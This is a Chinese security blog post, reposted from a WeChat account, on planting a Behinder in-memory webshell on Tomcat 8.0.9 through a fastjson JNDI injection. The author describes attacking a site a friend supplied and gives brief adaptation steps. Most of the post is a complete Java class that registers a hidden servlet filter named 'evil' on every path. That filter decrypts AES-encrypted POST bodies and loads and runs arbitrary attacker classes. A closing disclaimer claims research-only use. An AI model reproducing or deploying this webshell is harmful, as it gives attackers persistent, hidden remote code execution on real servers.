事情是这样,朋友发了个站,存在fastjson,本来想着直接打一下内存马交给他收工,发现tomcat8.0.9有点问题。
(1)内存马打不上
简单探测了一下,可以利用JNDIExploit-1.3-SNAPSHOT.jar直接执行命令,开始打内存马。
(2)直接打内存马,发现冰蝎连接不上。本地搭建环境,查看哪儿的问题
发现webappClassLoaderBase爆红了,这不是tomcat的基本类加载器吗,有点离谱,发现tomcat8.0.9没有这个东西。接下来转化思路
1。搜索一个通用的方式获取StandardContext
2。本地调节看看能不能重新获取
(3)这里选择了第二种方式。我先看一下8.0.9的tomcat基本web加载器,直接定义一个serlvet获取classloader看看就行。就不详细说过程了,直接看结果
区别
-
基础加载器变为了WebappClassLoader
-
获取的filterconfigs字段直接在StandrdContext中
(4)稍微修改一下内存马
(5)本地测试上线成功
代码如下
// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompiler)//import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationTargetException;import java.lang.reflect.Method;import java.util.HashMap;import java.util.Map;import javax.crypto.Cipher;import javax.crypto.spec.SecretKeySpec;import javax.servlet.DispatcherType;import javax.servlet.Filter;import javax.servlet.FilterChain;import javax.servlet.FilterConfig;import javax.servlet.ServletException;import javax.servlet.ServletRequest;import javax.servlet.ServletResponse;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import javax.servlet.http.HttpSession;import org.apache.catalina.Context;import org.apache.catalina.core.ApplicationFilterConfig;import org.apache.catalina.core.StandardContext;import org.apache.catalina.loader.WebappClassLoader;import org.apache.tomcat.util.descriptor.web.FilterDef;import org.apache.tomcat.util.descriptor.web.FilterMap;import sun.misc.BASE64Decoder;public class be extends AbstractTranslet implements Filter {public be() {}public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}public void init(FilterConfig filterConfig) throws ServletException {}public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {try {System.out.println("Do Filter ......");HttpServletRequest request = (HttpServletRequest)servletRequest;HttpServletResponse response = (HttpServletResponse)servletResponse;HttpSession session = request.getSession();HashMap pageContext = new HashMap();pageContext.put("request", request);pageContext.put("response", response);pageContext.put("session", session);if (request.getMethod().equals("POST") && request.getHeader("*****").equals("****")) {String k = "dacfb08ed58189ca";session.putValue("u", k);Cipher c = Cipher.getInstance("AES");c.init(2, new SecretKeySpec(k.getBytes(), "AES"));Method method = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);method.setAccessible(true);byte[] evilclass_byte = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine()));Class evilclass = (Class)method.invoke(this.getClass().getClassLoader(), evilclass_byte, 0, evilclass_byte.length);evilclass.newInstance().equals(pageContext);}} catch (Exception var13) {var13.printStackTrace();}filterChain.doFilter(servletRequest, servletResponse);System.out.println("doFilter");}public void destroy() {}public static void main(String[] args) {}static {try {String name = "evil";String URLPattern = "/*";WebappClassLoader webappClassLoaderBase = (WebappClassLoader)Thread.currentThread().getContextClassLoader();StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();Class aClass = null;try {aClass = standardContext.getClass();// aClass = standardContext.getClass().getSuperclass();aClass.getDeclaredField("filterConfigs");} catch (Exception var12) {aClass = standardContext.getClass();aClass.getDeclaredField("filterConfigs");}Field Configs = aClass.getDeclaredField("filterConfigs");Configs.setAccessible(true);Map filterConfigs = (Map)Configs.get(standardContext);be behinderFilter = new be();FilterDef filterDef = new FilterDef();filterDef.setFilter(behinderFilter);filterDef.setFilterName("evil");filterDef.setFilterClass(behinderFilter.getClass().getName());standardContext.addFilterDef(filterDef);FilterMap filterMap = new FilterMap();filterMap.addURLPattern("/*");filterMap.setFilterName("evil");filterMap.setDispatcher(DispatcherType.REQUEST.name());standardContext.addFilterMapBefore(filterMap);Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);constructor.setAccessible(true);ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)constructor.newInstance(standardContext, filterDef);filterConfigs.put("evil", filterConfig);} catch (NoSuchFieldException var13) {var13.printStackTrace();} catch (InvocationTargetException var14) {var14.printStackTrace();} catch (IllegalAccessException var15) {var15.printStackTrace();} catch (NoSuchMethodException var16) {var16.printStackTrace();} catch (InstantiationException var17) {var17.printStackTrace();}}}
原文始发于微信公众号(e0m安全屋):关于tomcat8.0.9打冰蝎
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论